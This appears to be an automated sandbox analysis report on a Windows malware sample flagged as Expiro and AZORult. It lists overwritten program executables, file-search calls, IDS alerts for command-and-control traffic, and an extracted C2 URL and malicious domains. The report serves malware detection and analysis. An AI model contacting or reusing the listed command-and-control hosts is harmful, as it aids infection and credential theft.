              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 source: ssvagent.exe.13.dr
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdbSHA256 source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: default-browser-agent.pdb source: alg.exe, 0000000D.00000003.2095519854.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: updater.pdb source: alg.exe, 0000000D.00000003.2233883361.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Xml.pdb@\ source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr

              Spreading

              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\vds.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\snmptrap.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\Spectrum.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\Locator.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\7-Zip\7z.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\AppVClient.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\SysWOW64\perfhost.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\msiexec.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\TieringEngineService.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\FXSSVC.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\SensorDataService.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\msdtc.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
              Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004098A0 FindFirstFileW,FindNextFileW,8_2_004098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D0A0 FindFirstFileW,8_2_0040D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,8_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,8_2_00408D44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00415610 FindFirstFileW,FindNextFileW,8_2_00415610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,8_2_004087DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D06E FindFirstFileW,8_2_0040D06E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041303C FindFirstFileW,FindNextFileW,FindClose,8_2_0041303C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040989F FindFirstFileW,FindNextFileW,8_2_0040989F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,8_2_004111C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,8_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,8_2_00408D3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041158C FindFirstFileW,FindNextFileW,FindClose,8_2_0041158C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00411590 FindFirstFileW,FindNextFileW,FindClose,8_2_00411590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,8_2_00412D9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\

              Networking

Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49709 -> 18.141.10.107:80
Source: Network traffic | Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.9:49707 -> 104.21.96.1:80
Source: Network traffic | Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.9:49707 -> 104.21.96.1:80
Source: Network traffic | Suricata IDS: 2029137 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M2 : 104.21.96.1:80 -> 192.168.2.9:49707
Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:50942 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:65066 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:61505 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:50995 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49770 -> 18.246.231.120:80
Source: Network traffic | Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.9:49722 -> 104.21.96.1:80
Source: Network traffic | Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.9:64907 -> 1.1.1.1:53
Source: Malware configuration extractor | URLs: http://k1d5.icu/TP341/index.php
Source: unknown | DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown | Network traffic detected: DNS query count 87
